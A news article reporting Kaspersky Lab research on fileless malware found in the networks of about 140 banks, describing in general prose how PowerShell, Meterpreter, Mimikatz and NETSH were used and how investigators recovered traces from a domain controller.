Previously associated with nation-sponsored attacks like the Stuxnet worm, fileless malware is now going mainstream. According to an upcoming Kaspersky Lab research, networks of at least 140 banks have been infected by fileless malware that relies on in-memory design to remain nearly invisible, as explained by Arstechnica.
Considering the difficulties in spotting such attacks, the number of affected enterprises is most likely much higher than initially anticipated. The deployment of legitimate and quite popular tools such as PowerShell, Metasploit and Mimikatz for the injection process makes the detection almost impossible, researchers point out.
In a conversation with Arstechnica Kaspersky Lab expert Kurt Baumgartner said that “what’s interesting here is that these attacks are ongoing globally against banks themselves”, adding that in most cases the banks haven’t been prepared effectively and can’t deal with these attacks. Things get even worse as the anonymous 140 organizations are scattered throughout the 40 different countries, with US, France, Ecuador, Kenya, and the UK being the top five most targeted territories.
Unfortunately, Kaspersky researchers weren’t able to outline who is behind the attacks, and whether it is a single group or several competing ones. Why is that? Fileless malware in combination with command-server domains which by default are not associated with any whois data makes the identification process quite challenging, if not utterly impossible.
How Did Kaspersky Lab Come Across These Findings?
The fileless menace deployed against banks and enterprises was first discovered at the end of 2016. This is when an unnamed bank’s security team came across a copy of Meterpreter, an in-memory component of Metasploit, residing inside physical memory of a Microsoft domain controller, Arstechnica says. The team later concluded that the Meterpreter code was downloaded and injected into memory using PowerShell commands. The victimized system also used Microsoft’s NETSH networking tool to transport data to servers controlled by the attackers. Mimikatz was also deployed to obtain admin privileges.
There was almost no evidence left as the attackers hid the PowerShell commands into the Windows registry. There was still some intact evidence left – on the domain controller. Researchers believe it was still there because it hadn’t been restarted before Kaspersky began their examination. Eventually the researchers were able to restore the Meterpreter and Mimikatz code to determine that the tools were deployed to collect passwords of sys admins and for the remote administration of infected host computers.
We’re looking at the common denominator across all of these incidents, which happens to be this odd use in embedding PowerShell into the registry in order to download Meterpretor and then carry out actions from there with native Windows utilities and system administrative tools.
As to how the attacks were initiated, nothing is yet concrete but it’s possible that SQL injection was used together with exploits targeting WordPress plugins. More details about the fileless malware attacks are expected in April, including details on how the infections were deployed to siphon money out of ATMs.